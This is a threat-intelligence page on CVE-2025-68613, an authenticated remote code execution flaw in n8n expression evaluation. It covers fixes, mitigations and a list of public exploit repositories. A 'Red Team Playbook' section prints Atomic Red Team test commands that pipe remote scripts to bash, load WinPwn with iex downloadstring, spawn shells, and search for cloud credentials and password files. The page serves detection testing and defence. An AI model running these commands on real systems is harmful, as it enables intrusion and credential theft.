CVE-2025-68613
Overview
This vulnerability is a critical remote code execution flaw caused by insufficient isolation in the workflow expression evaluation component of n8n. The root cause lies in the evaluation context for expressions supplied by authenticated users during workflow configuration, which is not adequately sandboxed from the underlying Node.js runtime environment. This permits execution of arbitrary code within the n8n process context via crafted expressions.
Vulnerability Description
n8n is an open source workflow automation platform. Versions starting with 0.211.0 and prior to 1.120.4, 1.121.1, and 1.122.0 contain a critical Remote Code Execution (RCE) vulnerability in their workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime. An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations. This issue has been fixed in versions 1.120.4, 1.121.1, and 1.122.0. Users are strongly advised to upgrade to a patched version, which introduces additional safeguards to restrict expression evaluation. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only; and/or deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation. These workarounds do not fully eliminate the risk and should only be used as short-term measures.
Impact
An attacker with a valid n8n user account can execute arbitrary code on the server hosting n8n, gaining the same privileges as the n8n process. This enables unauthorized access to sensitive data, modification or deletion of workflows, and execution of system-level commands, potentially leading to full compromise of the affected environment. The attack requires authentication but no additional user interaction, making it feasible for any user with workflow editing permissions to exploit.
Solution
Users should upgrade n8n to versions 1.120.4, 1.121.1, or 1.122.0 where the issue is resolved with enhanced expression evaluation safeguards. Detailed patch instructions and advisories are available at the official n8n GitHub security advisory page (https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp). As a temporary mitigation, restrict workflow creation and editing permissions to fully trusted users and deploy n8n in a hardened environment with limited OS privileges and network access.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the workflow automation platform n8n arises from a critical flaw in its expression evaluation system. This flaw allows authenticated users to supply expressions that may be executed in a context that lacks sufficient isolation from the underlying runtime environment. As a result, an attacker with valid credentials can exploit this weakness to execute arbitrary code with the same privileges as the n8n process. This vulnerability is particularly concerning because it does not require any special privileges beyond those of a regular user, making it accessible to a broader range of potential attackers who may have legitimate access to the system.
Various attack vectors can be employed to exploit this vulnerability. An attacker could craft malicious expressions during the workflow configuration phase, which, when evaluated, could lead to the execution of arbitrary commands on the host system. For instance, an attacker could manipulate the workflow to access sensitive data, modify existing workflows, or even execute system-level operations that compromise the integrity and confidentiality of the entire system. The implications of such exploitation are severe, as it could lead to unauthorized access to sensitive information, disruption of services, or even complete control over the affected instance.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on n8n for automating critical business processes. The potential for full compromise of the affected instance poses a considerable business risk, as attackers could gain access to sensitive data, intellectual property, or customer information. Additionally, the ability to modify workflows could lead to operational disruptions, financial losses, and damage to an organization’s reputation. The risk is exacerbated in environments where n8n is integrated with other systems, as the exploitation could have cascading effects across interconnected applications and services.
To address this vulnerability, organizations must prioritize detection and mitigation strategies. The most effective long-term solution is to upgrade to the patched versions of n8n, which include enhanced safeguards to restrict expression evaluation and prevent unauthorized code execution. In scenarios where immediate upgrades are not feasible, administrators should implement temporary mitigations, such as limiting workflow creation and editing permissions to trusted users only. Furthermore, deploying n8n in a hardened environment with restricted operating system privileges and network access can help reduce the potential impact of exploitation. While these workarounds can provide some level of protection, they do not eliminate the risk entirely and should only be considered as interim measures until a full upgrade can be performed.
In conclusion, the critical vulnerability in n8n's workflow expression evaluation system presents a serious threat to organizations utilizing this platform. The ease of exploitation, combined with the potential for severe consequences, underscores the importance of prompt action to mitigate risks. By upgrading to the latest versions and implementing robust access controls, organizations can significantly reduce their exposure to this vulnerability and protect their sensitive data and operational integrity. Continuous monitoring and assessment of the security posture surrounding n8n will also be essential in ensuring that any emerging threats are promptly addressed.
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2025-68613, with telemetry indicating increased attempts to leverage the critical RCE vulnerability in n8n’s workflow expression evaluation. This uptick coincides with the recent addition of the vulnerability to the KEV catalog, which has likely raised awareness among threat actors. Concurrently, multiple new proof-of-concept exploits and scanning tools have emerged publicly, lowering the barrier for adversaries to conduct reconnaissance and exploitation. Although the EPSS score remains high and stable, the expanded availability of exploit code and detection tooling suggests that exploitation attempts may become more frequent and widespread. For defenders, this evolution underscores an elevated risk environment where opportunistic attackers can more readily weaponize the vulnerability, increasing the likelihood of successful intrusions. Consequently, the threat level associated with CVE-2025-68613 should be considered heightened, warranting increased vigilance in monitoring and detection efforts.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
N8n | N8n | All |
cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*
|
|
|
N8n | N8n | 1.121.0 |
cpe:2.3:a:n8n:n8n:1.121.0:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
n8n Workflow Expression Remote Code Execution
exploits/multi/http/n8n_workflow_expression_rce
|
Lukas Johannes Möller | Unknown | unix, linux, win | View |
GitHub PoCs (33)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
wioui/n8n-CVE-2025-68613-exploit
CVE-2025-68613: n8n RCE vulnerability exploit and documentation
|
wioui | 101 | 22 | 2025-12-22 | View |
|
rxerium/CVE-2025-68613
Detection for CVE-2025-68613
|
rxerium | 27 | 3 | 2025-12-22 | View |
|
TheStingR/CVE-2025-68613-POC
Public PoC + Scanner and research for CVE-2025-68613: Critical RCE in n8n Workflow Automation via Expression Injection (...
|
TheStingR | 26 | 0 | 2025-12-22 | View |
|
hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow Automation Remote Code Execution
|
hackersatyamrastogi | 5 | 3 | 2025-12-25 | View |
|
LingerANR/n8n-CVE-2025-68613
This laboratory provides a controlled environment to analyze and reproduce CVE-2025-68613 in a vulnerable n8n instance.
|
LingerANR | 7 | 0 | 2025-12-26 | View |
|
sahilccras/Blackash-CVE-2025-68613
CVE-2025-68613
|
sahilccras | 0 | 2 | 2025-12-22 | View |
|
JohannesLks/CVE-2025-68613-Python-Exploit
Python Exploit for CVE-2025-68613.
|
JohannesLks | 1 | 0 | 2025-12-25 | View |
|
mbanyamer/n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613
Proof-of-Concept exploit for CVE-2025-68613: Authenticated Remote Code Execution in n8n via Expression Injection
|
mbanyamer | 1 | 0 | 2025-12-25 | View |
|
releaseown/analysis-and-poc-n8n-CVE-2025-68613
Technical study of the CVE-2025-68613 vulnerability in n8n, covering affected versions, laboratory exploration scenario,...
|
releaseown | 1 | 0 | 2025-12-25 | View |
|
Khin-96/n8n-cve-2025-68613-thm
|
Khin-96 | 1 | 0 | 2025-12-26 | View |
|
Ak-cybe/CVE-2025-68613-n8n-rce-analysis
CVE-2025-68613 (n8n) Critical RCE analysis + defensive recommendations (patch validation, detection ideas, and hardening...
|
Ak-cybe | 1 | 0 | 2025-12-26 | View |
|
azilRababe/CVE-2025-68613
Technical analysis of CVE-2025-68613, a critical Expression Injection vulnerability in n8n that allows authenticated att...
|
azilRababe | 0 | 0 | 2026-06-21 | View |
|
canpilayda/n8n-RCE-CVE-2025-68613
|
canpilayda | 0 | 0 | 2026-04-14 | View |
|
reem-012/poc_CVE-2025-68613
POC for CVE-2025-68613
|
reem-012 | 0 | 0 | 2025-12-23 | View |
|
intbjw/CVE-2025-68613-poc-via-copilot
通过GitHub Copilot 辅助分析CVE-2025-68613漏洞
|
intbjw | 0 | 0 | 2025-12-23 | View |
|
ali-py3/Exploit-CVE-2025-68613
|
ali-py3 | 0 | 0 | 2025-12-23 | View |
|
nehkark/CVE-2025-68613
This repository contains a laboratory-grade analysis and a **safe Proof-of-Concept** for the vulnerability **CVE-2025-68...
|
nehkark | 0 | 0 | 2025-12-23 | View |
|
gagaltotal/n8n-cve-2025-68613
n8n CVE-2025-68613
|
gagaltotal | 0 | 0 | 2025-12-28 | View |
|
shibaaa204/CVE-2025-68613
Lab for CVE-2025-68613 n8n RCE
|
shibaaa204 | 0 | 0 | 2026-01-07 | View |
|
GnuTLam/POC-CVE-2025-68613
My poc to exploit this vuln :D
|
GnuTLam | 0 | 0 | 2025-12-23 | View |
|
secjoker/CVE-2025-68613
基于Pocsuite3 框架编写的漏洞验证与利用脚本,用于检测 n8n工作流自动化工具中的认证后远程代码执行漏洞(RCE)
|
secjoker | 0 | 0 | 2025-12-24 | View |
|
r4j3sh-com/CVE-2025-68613-n8n-lab
Analysis of CVE-2025-68613
|
r4j3sh-com | 0 | 0 | 2025-12-24 | View |
|
manyaigdtuw/CVE-2025-68613_Scanner
GUI Shodan-powered scanner to identify n8n instances exposed to CVE-2025-68613 (version range 0.211.0–1.122.0)
|
manyaigdtuw | 0 | 0 | 2025-12-24 | View |
|
AbdulRKB/n8n-RCE
Remote Code Execution via n8n Workflows (Based on CVE-2025-68613)
|
AbdulRKB | 0 | 0 | 2025-12-25 | View |
|
Dlanang/homelab-CVE-2025-68613
|
Dlanang | 0 | 0 | 2025-12-26 | View |
|
cv-sai-kamesh/n8n-CVE-2025-68613
|
cv-sai-kamesh | 0 | 0 | 2025-12-29 | View |
|
Rishi-kaul/n8n-CVE-2025-68613
|
Rishi-kaul | 0 | 0 | 2025-12-29 | View |
|
ahmedshamsddin/n8n-RCE-CVE-2025-68613
n8n RCE (CVE-2025-68613)
|
ahmedshamsddin | 0 | 0 | 2026-01-03 | View |
|
TheInterception/n8n_CVE-2025-68613_exploit_payloads
Expression injection payloads for n8n CVE-2025-68613 RCE
|
TheInterception | 0 | 0 | 2026-01-03 | View |
|
J4ck3LSyN-Gen2/n8n-CVE-2025-68613-TryHackMe
The minor methodology for room: https://tryhackme.com/room/n8ncve202568613
|
J4ck3LSyN-Gen2 | 0 | 0 | 2025-12-26 | View |
|
Victorhugofariasvieir66/relatorio-n8n.md
Relatório TryHackMe — n8n CVE-2025-68613 (CVSS 9.9)
|
Victorhugofariasvieir66 | 0 | 0 | 2026-01-22 | View |
|
h3raklez/CVE-2025-68613
CVE-2025-68613 — n8n RCE via Expression Injection
|
h3raklez | 0 | 0 | 2026-03-03 | View |
|
intelligent-ears/CVE-2025-68613
|
intelligent-ears | 0 | 0 | 2025-12-24 | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-68613 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316 |
| akamai.com |
NVD API
Exploit
Third Party Advisory
|
https://www.akamai.com/blog/security-research/2026/feb/zerobot-malware-targets-n8n-automation-platform |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-68613 |